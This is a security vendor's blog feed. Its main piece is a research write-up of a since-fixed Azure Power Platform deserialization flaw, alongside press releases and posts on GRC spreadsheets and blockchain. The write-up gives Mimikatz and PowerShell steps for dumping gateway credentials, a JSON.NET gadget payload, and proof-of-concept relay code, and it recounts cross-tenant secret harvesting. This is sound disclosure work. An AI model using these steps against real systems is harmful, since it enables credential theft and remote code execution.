
5 Reasons Why Your Biggest Cyber Risk Is Your Controls Spreadsheet

This is a guest post contributed by NetSPI’s partner, OpsEase.
Learn more about becoming a NetSPI partner here.


Using a spreadsheet to track and manage your controls leaves you ripe for a breach. Here’s why: your company probably falls into one of two camps.  

Scenario #1: Paying for a GRC Tool 

You’ve realized that using spreadsheets for control and risk management is a risk in and of itself, and you’ve shelled out big bucks to deploy a Governance, Risk, and Compliance (GRC) solution.  

Scenario #2: Using Spreadsheets to Track Controls 

Like so many other companies, you’ve evaluated GRC options only to find that they’re all too expensive, so you build and track your controls in a spreadsheet through manual effort. 

If you’re in the first camp, congrats: you’re ahead of the game, though likely at a relatively high cost. But most companies I’ve talked with cannot justify the cost of a GRC tool and fall into the second camp, using a spreadsheet to manage controls and risks.  

As a business owner myself, I completely understand. A spreadsheet doesn’t cost anything, and we can get through our audit. We can tell our customers and vendors a good story about our control framework. Our cyber insurer isn’t asking for much documentation at this point, so we can slide by… but the hidden costs and risks of a spreadsheet outweigh the cost of a reasonably priced GRC solution.  

5 Reasons Spreadsheets Don’t Provide Flawless Implementation of Controls

So, why is a spreadsheet your biggest cyber risk? Many possible threats exist today:  

  • Attackers trying to phish your employees 
  • Outdated systems without the latest patches 
  • A loose access control policy 
  • And a plethora of other risks 

Fortunately, your control framework has an answer to each of these. Moreover, if you flawlessly implemented and followed your control framework without fail, you’d reduce security risk exposure drastically. However, using a spreadsheet makes it impossible to flawlessly implement or follow your controls.  

Here are the top reasons why using spreadsheets for your controls and risk register is your greatest security threat.  

  1. Spreadsheets are not collaborative. More specifically, they don’t provide the ability to have controlled collaboration. Excel, SharePoint, and Google Sheets are collaborative tools, but they are designed for open collaboration rather than controlled collaboration. You cannot easily control visibility or assign only a subset of controls to internal or external resources.

    Locking down or hiding cells isn’t really a functional solution, especially when working with an external entity like a vendor. The last thing you want to do is give your vendor access to your security framework spreadsheet with all your controls. Your likely workaround is to send them a subset of controls in a different spreadsheet or document and then copy/paste the responses back, which is manual collaboration at best.  
  2. Spreadsheets cannot be automated. So much of our world has embraced automation to ensure process adherence, efficiency, and greater compliance to an outcome. Being able to assign controls, track completion, flag risks and alert on potential incidents is the next step to improve security, track risks and prepare for an audit. If it can’t be systematically controlled to ensure adherence, it’s a risk.  
  3. Spreadsheets are ripe for human errors. An age-old reality is that anytime there’s the potential for human error, it will likely happen at some point.

    Bob in IT forgets to check the firewall logs. A Microsoft SQL workload isn’t patched for months at a time and no one is checking. Sally leaves the company and still has access to the core systems months after departing.

    These are all simple examples of a control failing to be handled and the CISO or security team having no visibility or ability to track the risk.  
  4. Spreadsheets are not file systems. You cannot attach control documentation to a spreadsheet. Specifically, log files, screenshots, checklists, and the variety of other ways you need to document your controls cannot be attached, organized and presented in a spreadsheet. Most companies create a folder structure to store these files and link them into the spreadsheet. This process is terribly time consuming, fraught with potential errors (see point 3), isn’t easily collaborative (point 1), and can’t be automated (point 2) for approvals to ensure the documentation is compliant with the control.  
  5. Spreadsheets are not good enough for your auditors. They want to see proof of actions, especially attestation that something was done. A GRC system is the record of truth you can show your auditor, so you don’t have to dig through emails or meeting notes to find where you took action on a periodic control.  

By now you’ve realized that we have a distinct opinion on why spreadsheets simply do not cut it. Using them for your security framework is one of your greatest risks. Visit OpsEase, the GRC tool to help make compliance easy and affordable. 

Built by security professionals for security professionals, OpsEase is an IT security governance, risk and control (GRC) solution designed for SMB and mid-market companies to better monitor and manage their security controls. OpsEase gives solution providers a single pane of glass to manage security frameworks, whether for your own company or for the customers you manage, creating greater value for both you and your customers.


Riding the Azure Service Bus (Relay) into Power Platform

Azure maintains a large suite of automation tools across Logic Apps and the Power Platform (Automate, Apps, BI). On-Prem Data Gateways extend some of these automations by allowing actions to be carried out by a connected agent installed locally in customer networks.  

Originally these gateways were designed for Power BI and “personal use” only, but you can also connect them to an Azure tenant and make them available to the larger subscription. In essence, you can bind an on-prem data gateway to an Azure gateway resource, then leverage that on-prem data gateway in a limited set of Power Platform Connectors from Logic Apps. Microsoft maintains a list of these supported connectors in their documentation (we also queried support via APIs to verify its accuracy): 

  • Apache Impala 
  • BizTalk Server 
  • File System 
  • HTTP with Azure AD 
  • IBM DB2 / Informix / MQ
  • MySQL 
  • Oracle Database 
  • PostgreSQL 
  • SAP 
  • SharePoint Server
  • SQL Server 
  • Teradata 

Originally, we wanted to inspect how these Logic Apps interact with gateways and discover code execution opportunities from an Azure tenant into a host network. You might imagine the ability to access file data or force web requests on remote hosts as quite valuable to an attacker. However, our research led us in a more interesting direction that involved cross-tenant compromise in Power Platform Connectors hosted in Azure.

Installation Internals

The installation and setup of the gateway are straightforward. During the initial setup you’ll be prompted for account credentials, a gateway name, and a recovery key. After installation, the gateway should be bound to the Power Platform, and you can verify its availability in the Admin Portal. Connecting the gateway to an Azure subscription does require you to allocate a separate “On-Prem Gateway” object via the portal. It’s worth double-checking your region and target subscription before looking for the gateway under “Installation Name”. 

On-premises data gateway portal in Azure.
Power Platform admin center showing gateway cluster: demo-gateway.
Subscription and instance details within Azure data gateway.

Back on the gateway host, a service for Microsoft.PowerBI.EnterpriseGateway.exe will be installed to run core functions. A configuration app, EnterpriseGatewayConfigurator.exe, is available to view the status of the service, reconfigure parameters, run diagnostics, etc. Underneath, their relationship is backed by a localhost WCF TCP ServiceHost (IGatewayConfigurationService) using a ServiceAuthorizationManager to limit access to administrators. 

Any curiosity regarding the “recovery key” we supplied is well-founded. Gateways support both symmetric and asymmetric encryption to securely transfer sensitive credentials. When registering the gateway, the recovery key is used to derive a symmetric key stored by the gateway host. Random bytes are encrypted with this key and attached to an annotation field on the gateway object in the Power Platform (referred to as a “witness string”). This allows client-side verification of a matching key during recovery/change operations. In addition to the symmetric material, an RSA keypair is generated by the service and the public component is transferred during creation. As clarified by Microsoft, the symmetric key is retained locally as a derivation of the recovery key value. 
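To make that flow concrete, here is a minimal PowerShell sketch of the pattern described above: derive a symmetric key from the recovery key and a random salt, encrypt random bytes with it, and emit the pieces that would become the witness string. The gateway’s actual KDF, iteration count, and signature scheme aren’t documented here, so the PBKDF2 and HMAC-SHA256 choices below are illustrative assumptions only.

# Illustrative sketch only -- KDF and signature parameters are assumptions, not the gateway's real ones. 
$recoveryKey = "example-recovery-key" 

# Derive a 256-bit key from the recovery key and a random salt (PBKDF2 assumed). 
$salt = New-Object byte[] 16 
[System.Security.Cryptography.RandomNumberGenerator]::Create().GetBytes($salt) 
$kdf = New-Object System.Security.Cryptography.Rfc2898DeriveBytes($recoveryKey, $salt, 100000) 
$key = $kdf.GetBytes(32) 

# Encrypt random bytes with the derived key; the ciphertext and IV become the "witness". 
$witness = New-Object byte[] 32 
[System.Security.Cryptography.RandomNumberGenerator]::Create().GetBytes($witness) 
$aes = [System.Security.Cryptography.Aes]::Create() 
$aes.Key = $key 
$cipher = $aes.CreateEncryptor().TransformFinalBlock($witness, 0, $witness.Length) 

# An HMAC over the ciphertext stands in for the "Signature" field (assumption). 
$sig = [System.Security.Cryptography.HMACSHA256]::new($key).ComputeHash($cipher) 

[PSCustomObject]@{ 
    EncryptedResult = [Convert]::ToBase64String($cipher) 
    IV              = [Convert]::ToBase64String($aes.IV) 
    Signature       = [Convert]::ToBase64String($sig) 
    Salt            = [Convert]::ToBase64String($salt) 
} | ConvertTo-Json 

The gatewayWitnessString and gatewaySalt fields in the creation request below follow the same general shape.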

We can see the client request to create the gateway here:

PUT /unifiedgateway/gateways/CreateGatewayWithApps HTTP/2 
Host: wabi-us-north-central-redirect.analysis.windows.net 
Authorization: Bearer [token] 

{ 
    "createGatewayRequest": { 
        "gatewayName": "demo-gateway", 
        "gatewayDescription": null, 
        "gatewayAnnotation": "{\"gatewayContactInformation\":[\"noexist@netspi.com\"],\"gatewayVersion\":\"3000.154.3\",\"gatewayWitnessString\":\"{\\\"EncryptedResult\\\":\\\"qAesqTDEw5WdQq[…]\\\",\\\"IV\\\":\\\"Zqq9Hc2qIFNzVOBEz5ymsg==\\\",\\\"Signature\\\":\\\"i9Urdz0HlpRBEuklU[…]\\\"}\",\"gatewayMachine\":\"DESKTOP-BDI31DO\",\"gatewaySalt\":\"51lQj3EFVfousJiQuSQdYQ==\",\"gatewayWitnessStringLegacy\":null,\"gatewaySaltLegacy\":null,\"gatewayDepartment\":null,\"gatewayVirtualNetworkSubnetId\":null}", 
        "gatewayPublicKey": "PD94bWwgdmVyc2lvbj0iMS4wIj8+DQo8UlNBUGFyYW1ldGVycyB4bWxuczp4c2Q9Imh0dHA[…]", 
        "gatewayVersion": "3000.154.3", 
        "gatewaySBDetails": null, 
        "gatewaySBDetailsSecondary": null, 
        "createSecondaryRelay": true 
    } 
}

The response to this request gives us additional context for how the gateway communicates with other components:

HTTP/2 200 OK 
Content-Type: application/json; charset=utf-8 
Requestid: f30a7f4a-8dea-4b66-abe3-430054f0ed72 

{ 
    "gatewayId": 3139190, 
    "gatewayObjectId": "7a67b558-5ec0-4588-8c97-c2dd8ee2fb1d", 
    "gatewayName": "demo-gateway", 
    "gatewayType": "Resource", 
    "gatewaySBDetails": { 
        "gatewaySBKey": "ABBBmLK2loqL7yY414H/X33xAADL3Q/QZPLeyxbb14=", 
        "gatewaySBKeyName": "ListenAccessKey", 
        "gatewaySBEndpoint": "sb://wabi-us-north-central-relay12.servicebus.windows.net/4ec23ba7-6ebd-4ab4-921a-5256e2a27a70/" 
    }, 
    "gatewaySBDetailsSecondary": null, 
    "deprecatedServiceBusNamespace": null, 
    "deprecatedServiceBusEndpoint": null, 
    "deprecatedServiceBusNamespaceSecondary": null, 
    "deprecatedServiceBusEndpointSecondary": null 
}

On-Prem Data Gateways leverage an allocated Azure Relay connection (gatewaySBDetails) to securely expose their service to the public cloud. Azure Relay was formerly known as Service Bus Relay, hence the Service Bus key names. This allows cloud resources to bind to the gateway as if it were another cloud service and issue data processing requests. Users can supply their own relay details, or have the Power Platform allocate one. This relationship is managed by the Microsoft.PowerBI.* libraries and leverages a NetTcpRelayBinding and ServiceHost to expose the gateway to the public cloud. You can think of this as a reverse proxy to the gateway host via Azure Relay. 

In terms of connecting to this Azure Relay, the key material is readily available to us by proxying web traffic during installation. However, inspecting the local storage of this data is also a valuable exercise. All sensitive config data is stored in “%LocalAppData%\Microsoft\On-premises data gateway\Gateway.bin” from the context of the service account. It’s a serialized JSON block with values protected by user-context DPAPI keys. We can perform a quick extraction using Mimikatz and PowerShell: 

Extract the credentials and write blobs to disk: 

PS> $file = "C:\Windows\ServiceProfiles\PBIEgwService\AppData\Local\Microsoft\On-premises data gateway\Gateway.bin" 
PS> $creds = (cat $file | ConvertFrom-Json).credentials 
PS> $creds 

key               value 
---               ----- 
SBD               AQAAANCMnd8BFdERjHoA… 
SBDS              AQAAANCMnd8BFdERjHoA… 
SK                AQAAANCMnd8BFdERjHoA… 
LSK               AQAAANCMnd8BFdERjHoA… 
FileCredentialKey AQAAANCMnd8BFdERjHoA… 

PS> $creds | %{ [IO.File]::WriteAllBytes("$($_.key).bin", 
[Convert]::FromBase64String($_.value)) } 

Get the DPAPI_SYSTEM and service key with Mimikatz: 

PS> .\mimikatz.exe 
mimikatz # token::elevate 
mimikatz # lsadump::secrets 
mimikatz # dpapi::masterkey /in:"C:\Windows\ServiceProfiles\PBIEgwService\AppData\Roaming\Microsoft\Protect\[SID]\[KEY_GUID]" /system:[DPAPI_SYSTEM]

Decrypt the credential blobs:

mimikatz # dpapi::blob /in:SBD.bin /ascii 
mimikatz # dpapi::blob /in:SBDS.bin /ascii 
mimikatz # dpapi::blob /in:SK.bin /ascii 
mimikatz # dpapi::blob /in:LSK.bin /ascii 
mimikatz # dpapi::blob /in:FileCredentialKey.bin /ascii
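
As an aside, Mimikatz isn’t strictly required if you can already execute code as the PBIEgwService account itself: the blobs are user-scope DPAPI data, so the .NET ProtectedData API will decrypt them transparently in that context. A minimal sketch, assuming no optional entropy is in play:

# Run as the PBIEgwService account; DPAPI uses that account's master key automatically. 
Add-Type -AssemblyName System.Security 

$file  = "C:\Windows\ServiceProfiles\PBIEgwService\AppData\Local\Microsoft\On-premises data gateway\Gateway.bin" 
$creds = (Get-Content $file | ConvertFrom-Json).credentials 

foreach ($c in $creds) { 
    $blob  = [Convert]::FromBase64String($c.value) 
    # Assumes no optional entropy was supplied; adjust if decryption fails. 
    $plain = [System.Security.Cryptography.ProtectedData]::Unprotect($blob, $null, [System.Security.Cryptography.DataProtectionScope]::CurrentUser) 
    # Output encoding of the decrypted payload is assumed to be UTF-8. 
    "{0}: {1}" -f $c.key, [Text.Encoding]::UTF8.GetString($plain) 
}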

The contents of FileCredentialKey give us the best context for the other values. The SBD blob is the allocated Azure Relay information from gateway creation, the SK blob is the symmetric key derived from the recovery value, and keyContainerName is the CSP name for our generated asymmetric key. With installation and some internals out of the way, let’s move on to how data is serialized and passed on the relay.

{ 
    "id": 3139190, 
    "isDisconnected": true, 
    "objectId": "a9e6208f-669f-412f-a542-a4538121c38b", 
    "backendUri": "https://wabi-us-north-central-redirect.analysis.windows.net/", 
    "keyContainerName": "OdgAsymmetricKey", 

    "serviceBusDetails": {"index": "SBD"}, 
    "serviceBusDetailsSecondary": {"index": "SBDS"}, 
    "symmetricKey": {"index": "SK"}, 
    "legacySymmetricKey": {"index": "LSK"} 
}

Type Handling and Binders

The interface exposed on the relay-backed ServiceHost is very simple. It’s essentially a single TransferAsync function on the gateway side and a callback contract for replying (TransferCallbackAsync). Both functions take a single byte array as their argument.

public interface IGatewayTransferCallback 
{ 
    [OperationContract(IsOneWay = true)] 
    Task TransferCallbackAsync(byte[] packet); 
} 

[ServiceContract(CallbackContract = typeof(IGatewayTransferCallback))] 
public interface IGatewayTransferService 
{ 
    [OperationContract(IsOneWay = true)] 
    Task PingAsync(); 

    [OperationContract(IsOneWay = true)] 
    Task TransferAsync(byte[] packet); 
}

The binary data passed to these functions is referred to as a Relay Packet. These packets are serialized binary data blocks, optionally compressed or chunked, and prefixed with a RelayPacketHeader to provide context.

[Flags] 
public enum ControlFlags : byte 
{ 
    None = 0, 
    EndOfData = 1, 
    HasTelemetry = 2, 
    HasCorrectDataSize = 4, 
} 

public enum XPress9Level 
{ 
    None = 0, 
    Level6 = 6, 
    Level9 = 9, 
} 

public enum DeserializationDirective 
{ 
    Json = 1, 
    BinaryRowset = 2, 
    BinaryVarData = 3, 
} 

[StructLayout(LayoutKind.Explicit, Size = 21, Pack = 1)] 
public sealed class RelayPacketHeader 
{ 
    private ControlFlags flags; 
    private int index; 
    private int uncompressedDataSize; 
    private int compressedDataSize; 
    private XPress9Level compressionAlgorithm; 
    private DeserializationDirective deserializationDirective; 
}

We are predominantly concerned with the Json deserialization directive, which is supported by standard JSON.NET (Newtonsoft) libraries. The inspection of core deserialization code leads us to an extremely concerning TypeNameHandling.All configuration.

static T JsonDeserialize<T>(string payload) where T : class 
{ 
    JsonSerializerSettings settings = new JsonSerializerSettings() 
    { 
        TypeNameHandling = TypeNameHandling.All, 
        SerializationBinder = (ISerializationBinder)new DataMovementSerializationBinder() 
        // ... 
    }; 

    return JsonConvert.DeserializeObject<T>(payload, settings); 
}

It would appear some considerations are made for type security. The DataMovementSerializationBinder is applied to check incoming type names for validity. However, the use of serialization binders for security is not recommended and this binder is a great example of why. 

We’ve extracted just a small snippet of the decompiled source, but the relevant weakness is the allow-listing of any type from the PowerBI, DataMovement, and Mashup assemblies in IsAcceptableAssemblyName, regardless of the specific type. 

public Type BindToType(string assemblyName, string typeName) { 
    if (this.IsAcceptableBasicTypeName(typeName) ||  
        this.IsAcceptableAssemblyName(assemblyName) || 
        this.IsAcceptableDictionaryType(typeName) ||  
        this.IsAcceptableMscorlibException(assemblyName, typeName) 
    ) { 
        return this.serializationBinder.BindToType(assemblyName, typeName); 
    } 

    return null; 
} 

private bool IsAcceptableAssemblyName(string assemblyName) { 
    return assemblyName.StartsWith("Microsoft.PowerBI") ||  
        assemblyName.StartsWith("Microsoft.DataMovement") ||  
        assemblyName.StartsWith("Microsoft.Mashup") ||  
        assemblyName.StartsWith("Microsoft.Data.Mashup"); 
}

A quick scan of available types leads us to Microsoft.Mashup.Storage.SerializableDictionary, a variant of the standard Dictionary class with a controllable value type that won’t be checked. We also need to find a vulnerable object tree that types some property as a generic Object to bypass IsAssignableTo checks, but that’s also quite trivial. Ultimately, Microsoft.PowerBI.DataMovement.Pipeline.InternalContracts.Communication.GatewayHttpWebRequest with a nested Microsoft.Mashup.Storage.SerializableDictionary for our WindowsIdentity gadget gets the job done: 

{ 
  '$type': 'Microsoft.PowerBI.DataMovement.Pipeline.InternalContracts.Communication.GatewayHttpWebRequest, Microsoft.PowerBI.DataMovement.Pipeline.InternalContracts', 
  'request': { '$type': 'System.Byte[], mscorlib', '$value': '/w==' }, 
  'property': { 
    '$type': 'System.Collections.Generic.Dictionary`2[[System.String, mscorlib],[System.Object, mscorlib]], mscorlib', 
    'foo': { 
      '$type': 'Microsoft.Mashup.Storage.SerializableDictionary`2[[System.String, mscorlib],[System.Security.Principal.WindowsIdentity, mscorlib]], Microsoft.MashupEngine', 
      'bar': { 
        'System.Security.ClaimsIdentity.actor': '**PAYLOAD**' 
      } 
    } 
  } 
}

Return to Sender

We now have the primitive necessary to exploit processing code on either end of the Azure Relay for code execution. We could attempt to target the gateway itself, but gaining remote access to the required access keys makes this a very limited attack vector. However, going the other way is much more interesting. The Power Platform runtime, which puts messages on the relay, likely leverages the same serialization code, and we already understand how to communicate on the relay. 

We can now leverage a minimal Azure Relay client to bind to the cloud and wait for tasking. When a Power Platform Connector communicates with the gateway, we can wrap our serialization payload in a RelayPacketHeader and deliver it using TransferCallbackAsync. Getting the Power Platform to communicate with the fake gateway is straightforward. We set up a fresh Logic App, select one of the on-prem supported connectors, and trigger any activity against our gateway (test connection, store credentials, query data, etc.). You can find the proof-of-concept on GitHub and the relevant code below.

class GatewayTransferService : IGatewayTransferService 
{ 
    public Task PingAsync() { 
        return Task.CompletedTask; 
    } 

    public Task TransferAsync(byte[] bytes) 
    { 
        string Payload = "..."; 

        var response = Encoding.Unicode.GetBytes(Payload); 
        byte[] responseBytes = new byte[response.Length + RelayPacketHeader.Size]; 

        new RelayPacketHeader() 
        { 
            HasCorrectDataSize = true, 
            IsLast = true, 
            Index = 0, 
            UncompressedDataSize = response.Length, 
            CompressedDataSize = response.Length, 
            CompressionAlgorithm = XPress9Level.None, 
            DeserializationDirective = DeserializationDirective.Json 
        }.Serialize(responseBytes); 

        Array.Copy((Array)response, 0, (Array)responseBytes, RelayPacketHeader.Size, response.Length); 

        IGatewayTransferCallback callback = OperationContext.Current.GetCallbackChannel<IGatewayTransferCallback>(); 
        return callback.TransferCallbackAsync(responseBytes); 
    } 
} 

// ... 

ServiceBusEnvironment.SystemConnectivity.Mode = ConnectivityMode.Http; 

ServiceHost serviceHost = new ServiceHost(typeof(GatewayTransferService)); 

serviceHost.AddServiceEndpoint( 
    typeof(IGatewayTransferService), 
    new NetTcpRelayBinding() { IsDynamic = false }, 
    Endpoint 
).Behaviors.Add( 
    new TransportClientEndpointBehavior { 
        TokenProvider = TokenProvider.CreateSharedAccessSignatureTokenProvider(KeyName, Key) 
    } 
); 

serviceHost.Open();
Logic Apps Designer showing the Power Platform application.

Depending on the connector used, different backends will process the final payload. Initially, we delivered exploratory payloads through various connectors, which in turn exfiltrated environment data to an Azure Function App. We selected the most promising backend without additional obvious sandboxing (HTTP with Azure AD) and deployed a full stage 2 agent into memory (Slingshot). We achieved SYSTEM access, and the execution environment was clearly deep inside first-party Power Platform services in Azure.  

From the compromised host, the IMDS endpoint granted an authentication token with access to various Key Vault secrets and keys. We retrieved fabric configuration files, tenant information, and access to managed identities. From the decrypted Azure VM extension settings, we were able to identify Storage Account keys along with several valid SAS token Storage Account URLs configured with long expiration durations (~3 months) and the ability to list and read files (sp=rl). Overall, we calculated access to at least 1,300 secrets/certs across ~180 vaults. When it was clear cross-tenant access was possible, we burned off the affected hosts and a full report was delivered to MSRC.

Screenshot showing code execution on power platform connectors host.
Screenshot showing cross-tenant access in Azure.
Screenshot showing cross-tenant access in Azure.

Conclusion

Microsoft fixed this issue by completely rebuilding their serialization binder to enforce a much stricter type allow list. They also appear to have distinct binders for the gateway and cloud sides, but safe serialization in such a complex system clearly remains a tricky task, even for Microsoft. There are many areas of related research that we didn’t get to. The Power Platform and its relationship to Azure is rich in technical complexity. I’m sure a motivated researcher could yield more interesting results from the execution of requests in the client, individual Logic App functionality, gateway APIs, and data sanitization. As we also discovered, different Logic Apps appeared to be supported by an array of backend systems with different configurations, isolations, and intents. I hope this post can inspire fresh eyes to look at these systems more. 


Read more of NetSPI’s cloud penetration testing research on our technical blog.

Appendix A – Disclosure Timeline 

  • September 2022: Report filed with MSRC. 
  • October 2022: MSRC opens case 75270 and additional details are provided. 
  • October 2022: Call with MSRC stakeholders to demonstrate vulnerability. 
  • November 2022: Fix is deployed to public cloud. 
  • December 2022: Fix is deployed to all remaining regions. 


NetSPI Uncovers Cross-Tenant Azure Vulnerability in Power Platform Connectors

NetSPI VP of Research finds cross-tenant compromise in popular Azure automation tool, works closely with Microsoft to remediate the issue.

Minneapolis, MN – NetSPI, the leader in offensive security, today disclosed the threat research findings of Vice President of Research Nick Landers, who discovered and reported a cross-tenant compromise in Power Platform Connectors, a first-party provider hosted in Microsoft Azure.  

In close collaboration with NetSPI, Microsoft quickly fixed the issue. Due to the cross-tenant implications of this vulnerability, if it were left unresolved, malicious attackers could have jumped between tenants using the Power Platform Connectors backend and gained access to sensitive data, Azure access tokens, and more. 

As background, Azure features a large suite of automation tools, including Logic Apps and the Power Platform. On-Prem Data Gateways extend these automation tools, allowing actions to be carried out by a connected agent installed locally in customer networks – which is where Landers found the vulnerability. Originally, these gateways were intended for personal use only, but users can also connect them to an Azure tenant and make them available to the larger subscription. In Landers’ research, he inspected how these Logic Apps interact with data gateways and discovered remote code execution opportunities on both the gateways themselves and the supporting Power Platform Connectors hosted in Azure, allowing for the compromise of cross-tenant data. 

“This vulnerability is yet another example of just how pervasive deserialization flaws continue to be, especially for large technology vendors like Microsoft,” explains Landers. “Security teams should be aware of deserialization-based vulnerabilities, assume most connected systems and apps are exploitable, and understand that the simple exploitation might be buried in a bit of technical complexity. I welcome the research community to join me in continued deserialization research as we work to make cross-tenant environments more secure.”  

Landers worked closely with the Microsoft Security Response Center (MSRC) to disclose and remediate the issue. As a resolution, the Power Platform team completely rebuilt their serialization binder to enforce stricter whitelists, while creating distinct binders for both gateway and cloud environments.  

A technical explanation of the vulnerability discovery can be found in the NetSPI technical blog, Riding the Azure Service Bus (Relay) into Power Platform. To connect with NetSPI for Azure cloud penetration testing, visit www.NetSPI.com.

About NetSPI  

NetSPI is the leader in enterprise penetration testing, attack surface management, and breach and attack simulation – the most comprehensive suite of offensive security solutions. Through a combination of technology innovation and human ingenuity NetSPI helps organizations discover, prioritize, and remediate security vulnerabilities. For over 20 years, its global cybersecurity experts have been committed to securing the world’s most prominent organizations, including nine of the top 10 U.S. banks, four of the top five leading global cloud providers, four of the five largest healthcare companies, three FAANG companies, seven of the top 10 U.S. retailers & e-commerce companies, and the top 50 companies in the Fortune 500. NetSPI is headquartered in Minneapolis, MN, with global offices across the U.S., Canada, the UK, and India.

Media Contacts: 
Tori Norris, NetSPI 
victoria.norris@netspi.com
(630) 258-0277  

Jessica Bettencourt, Inkhouse for NetSPI
netspi@inkhouse.com
(774) 451-5142 


6 Questions to Plan for Blockchain Security

Blockchain is an effective business tool that extends beyond the buzz of cryptocurrencies. Businesses are using blockchain for real-time transactions and secure payments at scale. Blockchain deployments vary for every organization, but its many uses and successes so far make it a technology to keep researching.

Planning for cybersecurity at the beginning of blockchain exploration helps create more secure deployments, especially when working with valuable financial information. The six questions below can guide internal conversations to align resources around secure blockchain deployments. Get more blockchain security tips in our eBook, “5 Blockchain Security Fundamentals Every C-Suite Needs to Know.”

Definition of Blockchain, or Distributed Ledger Technology (DLT) 

Distributed Ledger Technology (DLT), commonly known as “blockchain,” is a distributed database secured with cryptography. How this unfolds in reality has many interpretations, but one commonality runs through every blockchain use: every participant has a vested interest in the trustworthiness of the data. This creates an environment for secure transactions once servers, or nodes, work together to establish the true state of the database.  

“Blockchain is fundamentally a distributed database secured with cryptography.” 

One example of blockchain is smart contracts. They act as web applications stored directly on the chain and operate deterministically without requiring an entity to execute the code. Smart contracts allow responsible parties to communicate information including transactions without the use of an intermediary. 

The many unique use cases of blockchain give it vast appeal, but it may be particularly useful for organizations such as large financial institutions and retail groups. 

Blockchain Security in Deployments 

Much of the data handled with blockchain is considered sensitive, making it valuable to malicious actors. As with many newer technologies, vulnerabilities can become an issue if security is not baked in from the start. 

“Like any other technology, security flaws are typically discovered/introduced during integration, as opposed to being inherent to the technology itself.” 

Blockchain security issues can emerge from container configurations, vulnerable contract code, or weak permission models, to name a few. Exploring blockchain uses through a cybersecurity lens helps organizations get ahead of weaknesses and gaps before they become exploitable vulnerabilities.

Move beyond the challenge of digital asset acceptance with NetSPI’s blockchain security services. Optimize Blockchain Use.

6 Questions to Prioritize Blockchain Security 

These guiding questions will help uncover expectations and requirements as companies continue blockchain research. Use these as a starting point to gain alignment between IT and security teams, as well as other internal departments who may be affected by blockchain use. 

  1. Are teams in my organization pursuing blockchain uses? Have they consulted the security team for potential risks? Do we have trusted providers in place for third-party blockchain pentesting? Are we rushing the development of DLT solutions without proper security processes in place?  
  2. What chain technologies are going to be part of our deployments? Are these chains public/permissionless chains like Ethereum or Bitcoin? Or do we want to work with a permissioned chain system like Hyperledger?
  3. Are we developing or deploying smart contracts? Do we have a secure SDLC process developed for DLT? Is our development team properly trained in the security considerations of the chain? How will we support contract updates and security fixes? Do we have a code audit plan in place?
  4. Are we running our own nodes as part of the chain use? Will these be deployed on-premises, in Azure/AWS, or via a managed provider like IBM or Oracle? Have we considered configuration reviews for the supporting containers and hosts? Do we have threat models for other malicious nodes on the chain? Have we considered supply-chain threats for the code base?
  5. Are we taking custodial or direct ownership of digital assets? Is transaction signing and logic part of our solution? How are we securely managing cryptographic keys? Do we have a key recovery process in place? Are we relying entirely on third-party APIs to access the chain?
  6. Are we integrating with any off-chain assets (databases, APIs, etc.)? Have we mapped out threat scenarios related to state-desynchronization? Are we properly leveraging the native security of chain transactions for key logic? Are we storing sensitive data on the chain? 

Make Blockchain Security Part of Your Strategy 

The goal of DLT is to create a shared database which can be trusted by multiple entities who don’t necessarily trust one another. Blockchain is the answer to this challenge, but it’s a newer technology with its full potential still being realized. 

Continue your blockchain research by accessing our eBook “5 Blockchain Security Fundamentals Every C-Suite Needs to Know” or accelerate your blockchain use by connecting with our experts.


NetSPI Finds Privilege Escalation Vulnerability in Azure Function Apps

Cloud penetration testing leader identifies privilege escalation flaw in Azure’s popular solution for building cloud-native applications.

Minneapolis, MN – NetSPI, the leader in offensive security, today published details on a vulnerability found by Vice President of Research Karl Fosaaen, who discovered flawed functionality in Azure Function Apps that allowed for privilege escalation. 

Fosaaen and the NetSPI research team worked closely with Microsoft to resolve the issue. If left unresolved, users with ‘read only’ permissions on a Function App could gain full access to the Azure Function App container, granting them the ability to view and alter highly sensitive information, like backend code databases and password vaults. 

Function Apps is used for building cloud-native applications in Azure. At its core, Function Apps is a lightweight API service that can be used for building and hosting serverless applications. The Azure Portal allows users to view files associated with the Function App, along with the code for the application endpoints. 

“We see the Function Apps service used in about 80 percent of our penetration testing environments. With this being a privilege escalation issue, a minimally authorized user could have been given access to critical, often restricted roles that would allow them to pivot within an Azure subscription,” said Fosaaen. “Given the simplicity of the issue, it’s surprising that this vulnerability has made it this far without previously being detected, especially with the rise in APIs and cloud-native apps over the past few years.”

Fosaaen worked closely with the Microsoft Security Response Center (MSRC) to disclose and remediate the file access issues. The Reader role no longer has the ability to read files with the Function App VFS APIs. A technical overview of the vulnerability can be found on the NetSPI blog.  

The NetSPI Labs innovation and research group plans to continue exploring read-only privilege escalation opportunities across Azure. You can see the team’s cloud security research and past vulnerability disclosures at www.netspi.com.

About NetSPI  

NetSPI is the leader in enterprise penetration testing, attack surface management, and breach and attack simulation – the most comprehensive suite of offensive security solutions. Through a combination of technology innovation and human ingenuity NetSPI helps organizations discover, prioritize, and remediate security vulnerabilities. For over 20 years, its global cybersecurity experts have been committed to securing the world’s most prominent organizations, including nine of the top 10 U.S. banks, four of the top five leading global cloud providers, four of the five largest healthcare companies, three FAANG companies, seven of the top 10 U.S. retailers & e-commerce companies, and the top 50 companies in the Fortune 500. NetSPI is headquartered in Minneapolis, MN, with global offices across the U.S., Canada, the UK, and India.

Media Contacts: 
Tori Norris, NetSPI 
victoria.norris@netspi.com
(630) 258-0277  

Jessica Bettencourt, Inkhouse for NetSPI
netspi@inkhouse.com
(774) 451-5142 


Escalating Privileges with Azure Function Apps

As penetration testers, we continue to see an increase in applications built natively in the cloud. These are a mix of legacy applications that are ported to cloud-native technologies and new applications that are freshly built in the cloud provider. One of the technologies that we see being used to support these development efforts is Azure Function Apps. We recently took a deeper look at some of the Function App functionality that resulted in a privilege escalation scenario for users with Reader role permissions on Function Apps. In the case of functions running in Linux containers, this resulted in command execution in the application containers. 

TL;DR 

Undocumented APIs used by the Azure Function Apps Portal menu allowed for arbitrary file reads on the Function App containers.  

  • For the Windows containers, this resulted in access to ASP.NET encryption keys. 
  • For the Linux containers, this resulted in access to function master keys that allowed for overwriting Function App code and gaining remote code execution in the container. 

What are Azure Function Apps?

As noted above, Function Apps are one of the pieces of technology used for building cloud-native applications in Azure. The service falls under the umbrella of “App Services” and has many of the common features of the parent service. At its core, the Function App service is a lightweight API service that can be used for hosting serverless application services.  

The Azure Portal allows users (with Reader or greater permissions) to view files associated with the Function App, along with the code for the application endpoints (functions). In the Azure Portal, under App files, we can see the files available at the root of the Function App. These are usually requirement files and any supporting files you want to have available for all underlying functions. 

